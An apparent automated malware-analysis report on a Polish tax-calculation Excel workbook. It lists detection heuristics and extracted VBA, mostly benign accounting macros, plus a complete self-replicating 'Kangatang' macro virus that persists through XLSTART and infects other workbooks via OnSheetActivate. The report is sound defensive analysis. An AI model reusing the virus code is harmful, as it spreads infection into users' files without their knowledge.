MALICIOUS
264
Risk Score
Heuristics 8
-
ClamAV: Xls.Virus.Valyria-10007756-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Virus.Valyria-10007756-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls" -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
External workbook data link medium OOXML_EXTERNAL_REL_DATALINKExternal workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: file:///D:\dokumenty Magda\4. Starzy klienci\3. Empik\6. Podatek odroczony\9 wrzesień 2011\09 11 CIT FINAL.xlsm — a UNC/file path; opening the workbook and updating links could leak NetNTLM credentials to the host
-
Hidden worksheet (veryHidden, hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 7 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14814 bytes |
SHA-256: cf57579215acc9570d7a8fea9ca438216975ac348b9f5be168029796723cdcba |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Workbook_Open()
Sheets("INPUT").Protect Password:="podatek1234", userinterfaceonly:=True
Sheets("CIT_OPER").Protect Password:="podatek1234", userinterfaceonly:=True
Sheets("CIT_KAPI").Protect Password:="podatek1234", userinterfaceonly:=True
End Sub
Attribute VB_Name = "Arkusz21"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module8"
Option Explicit
Sub blokowanie()
Attribute blokowanie.VB_ProcData.VB_Invoke_Func = " \n14"
'
' blokowanie Makro
'
'
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
End Sub
Attribute VB_Name = "Module4"
Option Explicit
Public Sub LoadBS()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Dim Nazwa As String
'odblokuj all, w razie błędu zablokuj all i wyświetl komunikat
'On Error GoTo eH
'For Each wks In ThisWorkbook.Worksheets
' wks.Unprotect "dkwis2016"
'Next wks
Sheets("RAKS_BS").Unprotect ("podatek1234")
Application.ScreenUpdating = False
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
MsgBox ("Wybierz plik z bilansem z RAKS za bieżący rok")
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("RAKS_BS")
'MsgBox "Wybierz plik do ladowania bilansu"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(170, "G")).UnMerge
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(170, "G")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:G170").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
ActiveSheet.Range("i1") = "Bilans załadowany dnia " & Date
Worksheets("INPUT").Activate
Sheets("RAKS_BS").Protect ("podatek1234")
'For Each wks In ThisWorkbook.Worksheets
' wks.Protect "dkwis2016"
'Next wks
Else
End If
Exit Sub
eH:
'For Each wks In ThisWorkbook.Worksheets
' wks.Protect "dkwis2016"
'Next wks
MsgBox "Wystąpił błąd wykonania.", vbExclamation
End Sub
Public Sub LoadPL()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Application.ScreenUpdating = False
Sheets("RAKS_PL").Unprotect ("podatek1234")
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("RAKS_PL")
MsgBox "Wybierz plik do ladowania rachunku wynikow"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(100, "F")).UnMerge
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(100, "F")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:F100").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
customerWorkbook.Close savechanges:=False
ActiveSheet.Range("h1") = "Rachunek zysków załadowany dnia " & Date
Worksheets("INPUT").Activate
Sheets("RAKS_PL").Protect ("podatek1234")
Else
End If
End Sub
Public Sub LoadZOIS()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Dim Finalrow As Integer
Application.ScreenUpdating = False
Sheets("ZOIS").Unprotect ("podatek1234")
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("ZOIS")
MsgBox "Wybierz plik do ladowania obrotowki"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(10000, "z")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:z10000").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
customerWorkbook.Close savechanges:=False
Finalrow = Cells(Rows.Count, 2).End(xlUp).Row 'Counts # of rows in the data set,
Cells(1, 1).UnMerge
ActiveSheet.Range("A:A").TextToColumns Destination:=ActiveSheet.Range("A1")
Range(Cells(3, 12).Address, Cells(Finalrow, 12).Address).Formula = "=j3-k3"
'Range(Cells(3, 13).Address, Cells(Finalrow, 13).Address).Formula = "=a3*1"
'Range(Cells(1, "M"), Cells(10000, "m")).Copy
'Range(Cells(1, "A"), Cells(10000, "A")).PasteValues
'Range(Cells(1, "M"), Cells(10000, "m")).Clear
ActiveSheet.Range("m1") = "Zestawienie obrotówi sald załadowane dnia " & Date
Worksheets("INPUT").Activate
'Sheets("ZOIS").Protect ("podatek1234")
Else
End If
End Sub
Attribute VB_Name = "Module9"
Sub copy_arkusz_for_client()
Attribute copy_arkusz_for_client.VB_ProcData.VB_Invoke_Func = " \n14"
'
' copy_arkusz_for_client Makro
'
'
Sheets("KALK_POD").Select
Sheets("KALK_POD").Copy
Windows("CIT_v2.10_Spółka_MIESIAC_ROK.xlsm").Activate
End Sub
Attribute VB_Name = "Arkusz5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module6"
Attribute VB_Name = "Module5"
Option Explicit
Sub Ustawienia()
'Pokaz Ukryj CIT kapitałowy
If Worksheets("INPUT").Range("b36") = "TAK" Then
Application.ScreenUpdating = False
Worksheets("CIT_KAPI").Visible = True
Else
Worksheets("CIT_KAPI").Visible = False
Application.ScreenUpdating = True
End If
End Sub
'Pokaz Ukryj ZZWK
If Worksheets("WPR").Range("wariant_eq") = "TAK" Then
Application.ScreenUpdating = False
Worksheets("EQ").Visible = True
Aktywne_Pole_XML Worksheets("MapaXML").Range("U7", "W61"), "wlacz", 4
Else
Worksheets("EQ").Visible = False
Application.ScreenUpdating = True
Aktywne_Pole_XML Worksheets("MapaXML").Range("U7", "W61"), "wylacz", 4
Attribute VB_Name = "Arkusz8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module1"
Option Explicit
Sub ukrywanie_sekcja_1()
Call odkrywanie_v2(7, 206)
End Sub
Sub ukrywanie_sekcja_2()
Call odkrywanie_v2(418, 617)
End Sub
Sub ukrywanie_sekcja_finans()
Call odkrywanie_v2(216, 415)
End Sub
Sub ukrywanie_sekcja_3()
Call odkrywanie_v2(620, 819)
End Sub
Sub ukrywanie_sekcja_4()
Call odkrywanie_v2(824, 1023)
End Sub
Sub ukrywanie_sekcja_5()
Call odkrywanie_v2(1028, 1227)
End Sub
Sub ukrywanie_sekcja_kap_1()
Call odkrywanie_v2(6, 205)
End Sub
Sub ukrywanie_sekcja_kap_2()
Call odkrywanie_v2(212, 411)
End Sub
Sub ukrywanie_sekcja_kap_3()
Call odkrywanie_v2(414, 613)
End Sub
Sub ukrywanie_sekcja_kap_4()
Call odkrywanie_v2(618, 817)
End Sub
Sub ukrywanie_sekcja_kap_5()
Call odkrywanie_v2(822, 1021)
End Sub
Sub odkrywanie_v2(poczatek As Integer, koniec As Integer)
Dim i As Integer
i = Application.InputBox("Liczba wierszy widocznych", "Cancel Test")
If i < 10 Then
MsgBox ("Minimalna liczba wierszy to 10")
Exit Sub ' nie przetwarza linii kodu
ElseIf i > 200 Then
MsgBox ("Maksymalna liczba wierszy to 200")
Exit Sub
ElseIf i = False Then
Exit Sub
End If
Rows(poczatek & ":" & poczatek + i - 1).Hidden = False
If i = 200 Then
Rows(poczatek + i - 1 & ":" & koniec).Hidden = False
Else
Rows(poczatek + i & ":" & koniec).Hidden = True
End If
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "Module2"
Option Explicit
Sub utworz_kopie_pliku()
Dim plik_biezacy As Workbook
Set plik_biezacy = ActiveWorkbook
Dim plik_wynikowy As Workbook
Set plik_wynikowy = Workbooks.Add
plik_biezacy.Activate
'petla po arkuszach
Dim ark As Worksheet
For Each ark In Worksheets
'msgbox ark.Name
ark.Copy after:=plik_wynikowy.Sheets(plik_wynikowy.Sheets.Count)
Next
End Sub
Attribute VB_Name = "Module3"
Option Explicit
Sub haslowanie()
Dim pass As String
pass = InputBox("Podaj hasło")
Dim ark As Worksheet
For Each ark In Worksheets
ark.Protect pass, DrawingObjects:=True, Contents:=True, Scenarios:=False _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
Worksheets("ZOIS").Unprotect (pass)
Worksheets("TABELA_AM_POD").Unprotect (pass)
Next
End Sub
Sub odhaslowanie()
Dim pass As String
pass = InputBox("Podaj hasło")
Dim ark As Worksheet
For Each ark In Worksheets
'ark.Unprotect pass, DrawingObjects:=True, Contents:=True, Scenarios:=False _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
ark.Unprotect (pass)
Next
End Sub
Attribute VB_Name = "Module7"
Option Explicit
Sub mojPDF()
Dim Sciezka As String, Klient As String, Data As Date
Klient = ActiveSheet.Range("Klient")
Sciezka = ThisWorkbook.Path & "\"
Data = ActiveSheet.Range("Data")
ActiveSheet.ExportAsFixedFormat Type:=xlTypePDF, Filename:= _
Sciezka & Klient & " " & Data & "_INFO_CIT.pdf", _
Quality:=xlQualityStandard, IncludeDocProperties:=True, IgnorePrintAreas _
:=False, OpenAfterPublish:=True
End Sub
Sub mojPDF_OPER()
Dim Sciezka As String, Klient2 As String, Data2 As Date
Klient2 = ActiveSheet.Range("Klient2")
Sciezka = ThisWorkbook.Path & "\"
Data2 = ActiveSheet.Range("Data2")
ActiveSheet.ExportAsFixedFormat Type:=xlTypePDF, Filename:= _
Sciezka & Klient2 & " " & Data2 & "_INFO_CIT_OPER.pdf", _
Quality:=xlQualityStandard, IncludeDocProperties:=True, IgnorePrintAreas _
:=False, OpenAfterPublish:=True
End Sub
Attribute VB_Name = "Arkusz29"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Arkusz18"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Arkusz12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 55808 bytes |
SHA-256: 8db18f0fbc4da27ae608ead208d25b1fbb64161691a237e74c13d48260cf6f12 |
|||
|
Detection
ClamAV:
Xls.Virus.Valyria-10007756-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.